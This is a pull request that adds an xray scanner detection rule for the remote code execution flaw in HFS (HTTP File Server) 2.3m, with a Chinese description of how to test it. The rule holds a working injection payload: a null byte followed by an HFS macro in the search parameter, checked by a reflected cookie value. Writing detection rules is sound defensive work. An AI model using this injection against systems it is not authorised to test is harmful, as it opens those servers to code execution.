### PR TITLE
新增hfs-rce-poc

### DIFF
--- a/pocs/hfs-rce.yml
+++ b/pocs/hfs-rce.yml
@@ -1,0 +1,12 @@
+name: hfs-rce
+rules:
+  - method: GET
+    path: /?search==%00{.cookie|out|value%3dreg002.}
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    expression: |
+      response.status == 200 && response.headers["Set-Cookie"].contains("out=reg002;")
+detail:
+  author: Teahim
+  links:
+    - https://www.bbsmax.com/A/Ae5RqXBmJQ/


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
HFS (HTTP File Server)远程命令执行漏洞（RCE）

## 测试环境
https://sourceforge.net/projects/hfs/files/HFS/2.3m/hfs.exe/download

## 备注
运行存在漏洞版本的hfs后，使用xray指定该poc对hfs端口进行检测，匹配漏洞验证规则则存在漏洞。
效果截图：
![image](https://user-images.githubusercontent.com/68881035/156311593-e055cec7-5ca6-4efe-b8b4-8f4570f1d828.png)
